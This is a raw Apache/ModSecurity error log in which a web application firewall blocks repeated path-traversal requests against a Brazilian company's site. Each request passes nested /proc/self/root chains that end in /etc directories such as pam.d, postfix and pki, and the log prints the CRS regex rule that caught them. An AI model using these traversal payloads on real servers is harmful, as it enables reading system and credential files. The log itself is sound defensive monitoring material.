[Mon Mar 16 17:24:43.575918 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:35450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnC46lpbStxTqkSkuB1AAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:24:53.151343 2026] [:error] [pid 29802:tid 140411716749056] [client 74.7.241.46:49782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnFc_BxrYCr4hPDw8B4gAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:24:54.557855 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:57490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnFtSswJuvopo3lOh2jgAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:24:55.863117 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.241.46:57492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnF0r9dMAiw-8KANNfowAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:24:57.263213 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:57504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnGbABkC4fWIHEf8EMfAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:24:58.516675 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:52680] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnGrABkC4fWIHEf8EMfQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:24:59.835167 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:52694] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnG46lpbStxTqkSkuB1wAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:01.046245 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:52710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnHVajLEzk2WiQ-10qHwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:06.178998 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:52724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnILysWC90G-1nBrBcLgAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:08.031087 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:52738] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnJKTCbgAP5jq5TehD4AAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:10.402510 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:36136] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnJaTCbgAP5jq5TehD4QAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:11.913838 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.241.46:36150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnJ6TCbgAP5jq5TehD6AAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:13.128267 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.241.46:36154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnKaTCbgAP5jq5TehD6QAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:14.444683 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:36170] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnKqQpVkWug9HeOt9MtQAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:16.086909 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:36184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnK6QpVkWug9HeOt9MtwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:17.472661 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:36196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnLaQpVkWug9HeOt9MugAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:18.754045 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:34952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnLrABkC4fWIHEf8EMhgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:21.234152 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:34962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnMLABkC4fWIHEf8EMhwAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:22.639310 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.241.46:34972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnMs_BxrYCr4hPDw8B5wAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:24.180016 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:34974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnNNSswJuvopo3lOh2lgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:25.554049 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:34986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnNbysWC90G-1nBrBcNQAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:27.081406 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.241.46:34998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] 